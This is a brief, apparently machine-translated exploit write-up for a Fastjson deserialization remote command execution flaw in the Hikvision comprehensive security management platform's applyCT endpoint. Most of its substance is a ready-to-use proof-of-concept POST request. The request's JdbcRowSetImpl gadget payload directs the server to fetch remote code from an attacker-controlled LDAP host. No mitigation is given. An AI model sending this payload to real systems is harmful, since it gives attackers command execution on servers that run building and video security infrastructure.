Hikvision Comprehensive Security Management Platform Applyct Fastjson Remote Command Execution Vulnerability
Hikvision Comprehensive Security Management Platform Applyct Fastjson Remote Command Execution Vulnerability
HIKVISION Comprehensive Security Management Platform applyCT Fastjson Remote Command Execution Vulnerability
Vulnerability Description
HIKVISION comprehensive security management platform applyCT has a low-version Fastjson remote command execution vulnerability. An attacker can execute any command to obtain server permissions through the vulnerability.
Vulnerability Impact
HIKVISION Comprehensive Security Management Platform
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
POST /bic/ssoService/v1/applyCT
Content-Type: application/json
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
This post is licensed under CC BY 4.0 by the author.